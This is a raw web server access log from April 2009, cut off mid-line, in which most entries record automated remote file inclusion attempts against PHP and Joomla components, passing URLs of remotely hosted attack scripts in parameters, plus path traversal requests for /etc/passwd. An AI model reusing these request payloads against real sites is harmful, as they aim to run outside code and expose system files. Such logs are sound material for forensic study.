121.165.73.157 - - [28/Apr/2009:12:11:22 -0700] "GET /logs/access_081208.log//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:22 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:25 -0700] "GET /logs/access_080910.log//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:26 -0700] "GET /include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:27 -0700] "GET /logs/access_081208.log//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:27 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:31 -0700] "GET /logs/access_080910.log//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:12:11:38 -0700] "GET /logs///oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:12:11:38 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=../../../../../../../../etc/passwd HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:12:11:38 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
193.41.116.26 - - [28/Apr/2009:12:11:38 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.suburbane.org//cgi-bin.old? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:42 -0700] "GET /logs/access_090118.log/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:11:51 -0700] "GET /logs/access_090118.log/index.php?opcao=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:12:07 -0700] "GET /logs/?sourcedir=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 200 97188 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:12:07 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:12:07 -0700] "GET /logs/access_080412.log/?sourcedir=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:12:23 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:12:30 -0700] "GET /logs/access_090407.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:12:31 -0700] "GET /logs/access_090407.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:12:32 -0700] "GET /logs/?sourcedir=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 200 97188 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:12:33 -0700] "GET /logs/access_080412.log/?sourcedir=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:12:34 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:12:48 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:12:49 -0700] "GET /?sourcedir=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 200 43294 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
173.16.151.20 - - [28/Apr/2009:12:12:51 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:12:55 -0700] "GET /logs/access_080313.log/?sourcedir=http://h1.ripway.com/hoki121/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:13:03 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:13:03 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:13:03 -0700] "GET /logs/access_080222.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:13:03 -0700] "GET /logs/access_090217.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla///administrator/modules/id1.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:13:12 -0700] "GET /?sourcedir=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 200 43290 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:12:13:18 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:12:13:18 -0700] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:12:13:18 -0700] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.76.25 - - [28/Apr/2009:12:13:18 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:12:13:44 -0700] "GET /logs/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:12:13:44 -0700] "GET /logs/access_081007.log/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:12:13:44 -0700] "GET /logs/access_081107.log/appserv/main.php?appserv_root=http://www.uriyuri.com/bbs//skin/zero_vote/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:12:13:44 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.uriyuri.com/bbs//skin/zero_vote/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:13:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:12:13:47 -0700] "GET /appserv/main.php?appserv_root=http://www.uriyuri.com/bbs//skin/zero_vote/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:13:57 -0700] "GET /logs/access_090223.log/?sourcedir=http://h1.ripway.com/lia33/elsi.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:13:59 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:12:14:00 -0700] "GET /index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:14:03 -0700] "GET /logs/access_081208.log%20%20//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:14:04 -0700] "GET /logs/access_081208.log%20%20//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:14:04 -0700] "GET /logs/access_080910.log%20%20//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:14:05 -0700] "GET /logs/access_080910.log%20%20//include/admin.lib.inc.php?site_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:12:14:12 -0700] "GET /logs/access_090316.log/appserv/main.php?appserv_root=http://www.uriyuri.com/bbs//skin/zero_vote/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:12:14:12 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:12:14:12 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:12:14:12 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:12:14:12 -0700] "GET /logs/access_081208.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:12:14:25 -0700] "GET /appserv/main.php?appserv_root=http://www.uriyuri.com/bbs//skin/zero_vote/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:12:14:25 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.uriyuri.com/bbs//skin/zero_vote/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:14:33 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:14:33 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:14:34 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
201.232.54.48 - - [28/Apr/2009:12:14:36 -0700] "GET /logs/access_080401.log/appserv/main.php?appserv_root=http://www.uriyuri.com/bbs//skin/zero_vote/1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:12:14:47 -0700] "GET /logs/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:12:14:48 -0700] "GET /logs/access_081007.log/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:14:52 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:14:52 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:14:53 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:14:59 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:15:13 -0700] "GET /logs/access_090410.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:15:14 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:12:15:14 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:15:14 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:15:27 -0700] "GET /logs/access_090410.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:15:27 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:15:28 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:15:31 -0700] "GET /logs/access_080703.log/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:15:32 -0700] "GET /logs/access_080703.log/index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:15:37 -0700] "GET /logs/access_080412.log/?sourcedir=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:15:38 -0700] "GET /logs/access_080412.log/?sourcedir=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:12:15:41 -0700] "GET /index.php?go=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 200 43369 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:15:44 -0700] "GET /logs/?sourcedir=http://h1.ripway.com/aar212/idku.txt??? HTTP/1.1" 200 97188 "-" "libwww-perl/5.805" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:15:46 -0700] "GET /logs/?sourcedir=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 200 97188 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:12:15:50 -0700] "GET /logs/access_081208.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.37.11 - - [28/Apr/2009:12:15:50 -0700] "GET /logs/access_080615.log%20%20//include/monitoring/engine/MakeXML4statusCounter.php?fileOre=http://www.armatuhogar.com.ar//components/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:15:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:16:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:16:09 -0700] "GET /logs/access_080806.log/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:16:10 -0700] "GET /logs/access_090228.log/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:16:10 -0700] "GET /logs/access_081228.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.43 - - [28/Apr/2009:12:16:10 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:16:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:16:11 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:12:16:13 -0700] "GET /logs//upload/admin/frontpage_right.php?loadadminpage=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:12:16:13 -0700] "GET /logs/access_081030.log%20%20//upload/admin/frontpage_right.php?loadadminpage=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:12:16:13 -0700] "GET /upload/admin/frontpage_right.php?loadadminpage=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.115.89.68 - - [28/Apr/2009:12:16:13 -0700] "GET /logs/access_080108.log%20%20//upload/admin/frontpage_right.php?loadadminpage=http://jeta.co.kr//bbs/component/.jpg/kantap.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [28/Apr/2009:12:16:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:16:16 -0700] "GET /logs/access_081228.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:16:16 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.111.175.179 - - [28/Apr/2009:12:16:17 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.ybkor.com/bbs//skin/zero_vote/logs/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:16:18 -0700] "GET /logs/access_080806.log/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:12:16:19 -0700] "GET /logs/access_090228.log/index.php?content=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:16:25 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:16:25 -0700] "GET /logs/access_081015.log//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:16:25 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:16:30 -0700] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [28/Apr/2009:12:16:34 -0700] "GET /?sourcedir=http://h1.ripway.com/polo212/idku.txt??? HTTP/1.1" 200 43294 "-" "libwww-perl/5.805" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:16:35 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:16:35 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:12:16:35 -0700] "GET /logs/access_080919.log//include/admin.lib.inc.php?site_path=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.